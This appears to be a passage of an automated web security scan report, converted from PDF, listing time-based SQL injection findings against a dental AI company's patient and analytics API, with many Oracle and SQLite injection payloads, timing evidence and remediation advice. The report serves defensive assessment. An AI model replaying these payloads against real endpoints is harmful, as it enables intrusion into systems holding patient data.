Info

The guery time is controllable using parameter value [193" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [7,333] milliseconds, when the original unmodified query with value [193] took [782]

milliseconds

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

> field: [y], value [193" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Attack

The guery time is controllable using parameter value [193" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [8,264] milliseconds, when the original unmodified query with value [193] took [1,245]

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

> field: [y], value [195' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / ']

Evidence

Attack

The guery time is controllable using parameter value [195' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual Other union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT Info

UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [9,488] milliseconds, when the original unmodified guery with value [195] took [1,300]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [200" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Attack

Other

Info

The guery time is controllable using parameter value [200" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT

UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [7,341] milliseconds, when the original unmodified query with value [200] took [1,808]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

field: [y], value [203 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [203 / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,813] milliseconds, when the original unmodified query with value [203] took [2,191]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [208' / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

> ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / ']

Evidence

The query time is controllable using parameter value [208' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [8,345] milliseconds, when the original unmodified query with value [208] took [1,082]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [210" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The guery time is controllable using parameter value [210" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name

Method

Attack

Other Info

Attack

Other Info

('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [8,617] milliseconds, when the original unmodified guery with value [210] took [776] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [y], value [210' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ']

Evidence

Other Info

The guery time is controllable using parameter value [210' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [7,678] milliseconds, when the original unmodified query with value [210] took [974] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [y], value [215" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Other Info

The guery time is controllable using parameter value [215" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [6,624] milliseconds, when the original unmodified query with value [215] took [1,286] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [y], value [22 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

Other

Info

URL

Attack

The query time is controllable using parameter value [22 / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,307] milliseconds, when the original unmodified query with value [22] took [1,900] milliseconds

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [222 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name

('10.0.0.5') from dual) --]

Evidence

The query time is controllable using parameter value [222 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [6,925] milliseconds, when the original unmodified query with value [222] took [259] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Attack

POST

field: [y], value [222 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get host name

('10.0.0.5') from dual) -- 1

Evidence

The query time is controllable using parameter value [222 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [7,535] milliseconds, when the original unmodified query with value [222] took [1,384] milliseconds

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [225 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.5') from dual) --]

Evidence

Attack

The query time is controllable using parameter value [225 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [5,905] milliseconds, when the original unmodified query with value [225] took [762] milliseconds

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [227 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Attack

The query time is controllable using parameter value [227 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,884] milliseconds, when the original unmodified query with value [227] took [1,036] milliseconds

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [y], value [232" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Other Info

The query time is controllable using parameter value [232" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [6,191] milliseconds, when the original unmodified query with value [232] took [259] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [y], value [234 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

Other Info

The query time is controllable using parameter value [234 / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [11,452] milliseconds, when the original unmodified query with value [234] took [776] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [y], value [239' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '1

Evidence

Other Info

The guery time is controllable using parameter value [239' / (SELECT UTL INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '], which caused the request to take [9,190] milliseconds, when the original unmodified query with value [239] took [1,247] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Attack

POST

field: [y], value [239' / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '1

Evidence

Other

The query time is controllable using parameter value [239' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [9,903] milliseconds, when the original unmodified query with value [239] took [1,136] milliseconds

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Info

URL

POST

Attack

field: [y], value [25' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '] Evidence

Other Info The query time is controllable using parameter value [25' / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '], which caused the request to take [12,042] milliseconds, when the original unmodified query with value [25] took [2,800] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [y], value [252" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Other Info The query time is controllable using parameter value [252" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [7,897] milliseconds, when the original unmodified query with value [252] took [942] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [

Attack

field: [y], value [27" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Other Info The query time is controllable using parameter value [27" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [6,658] milliseconds, when the original unmodified query with value [27] took [776] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [

Attack

field: [y], value [27" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [27" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [8,522] milliseconds, when the original unmodified query with value [27] took [255] milliseconds

URL

Other

Info

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [y], value [312.13463469860596' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union

SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name ('10.0.0.5') from dual) / ']

Evidence

Info

UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. Other

get host name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [8,282] milliseconds, when the original unmodified guery with value

The query time is controllable using parameter value [312.13463469860596' / (SELECT

[312.13463469860596] took [1,671] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [314.42483077703736 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT

UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name

('10.0.0.5') from dual)]

Evidence

The guery time is controllable using parameter value [314.42483077703736 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,016] milliseconds, when the original unmodified query with value

[314.42483077703736] took [258] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [32" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

> ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [32" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [10,216] milliseconds, when the original unmodified query with value [32] took [2,599]

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [v], value [328 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [328 / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [8,203] milliseconds, when the original unmodified query with value [328] took [784]

milliseconds

milliseconds

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack

Other

Info

Attack

Other Info

Attack

Other Info

URL

field: [v], value [373.96992881625306" / (SELECT UTL INADDR.get host name('10.0.0.1')

from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT

UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name

('10.0.0.5') from dual) / "]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [373.96992881625306" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.

get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [6,331] milliseconds, when the original unmodified query with value

[373.96992881625306] took [257] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [y], value [54 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.

> get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [54 / (SELECT UTL INADDR.

get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take

[7,859] milliseconds, when the original unmodified query with value [54] took [998]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

field: [v], value [54 and exists (SELECT UTL INADDR.get host name('10.0.0.1') from dual

union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name

('10.0.0.5') from dual) --]

Evidence

Attack

The query time is controllable using parameter value [54 and exists (SELECT

UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR. get host name('10.0.0.2') from dual union SELECT UTL INADDR.get host name ('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) --], which caused the

request to take [8,345] milliseconds, when the original unmodified query with value [54] took [813] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [y], value [56" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [56" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take

[7,292] milliseconds, when the original unmodified query with value [56] took [945]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Other Info

Attack

Other Info

Method **POST** field: [y], value [59 / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. Attack get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)] Evidence The query time is controllable using parameter value [59 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual Other union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT Info UTL INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,310] milliseconds, when the original unmodified query with value [59] took [808] milliseconds **URL** https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **POST** Method field: [y], value [90' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. Attack get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '] Evidence The query time is controllable using parameter value [90' / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual Other union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT Info UTL INADDR.get host name('10.0.0.5') from dual) / '], which caused the request to take [6,517] milliseconds, when the original unmodified query with value [90] took [258] milliseconds 88 Instances Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?' If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Solution Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application.

Reference CWE Id https://cheatsheetseries.owasp.org/cheatsheets/SQL Injection Prevention Cheat Sheet.

<u>html</u>

WASC Id

89 19

Plugin Id 40021

High	SQL Injection - SQLite
Description	SQL injection may be possible.
URL	https://api.velmeni.ai/api/analytics/doctor_stats? organization_id=7&source_system=VELMENI_FOR_DENTIST
Method	GET
Attack	case randomblob(1000000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [773] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, when the original unmodified query with value [7] took [1,355] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [773] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, when the original unmodified query with value [7] took [1,355] milliseconds.
URL	https://api.velmeni.ai/api/analytics/generate_visit_report? visit_id=115535&report_type=pdf&source_system=VELMENI_FOR_DENTIST
Method	GET
Attack	case randomblob(100000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [769] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,788] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [248] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [769] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,788] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [248] milliseconds.
URL	https://api.velmeni.ai/api/organizations/practice/get/1273? source_system=VELMENI_FOR_DENTIST
Method	GET
Attack	case randomblob(100000000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [864] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,476] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [256] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [864] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,476] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [256] milliseconds.
URL	https://api.velmeni.ai/api/patient/56526/history/?source_system=VELMENI_FOR_DENTIST
Method	GET
Attack	case randomblob(10000000) when not null then 1 else 1 end
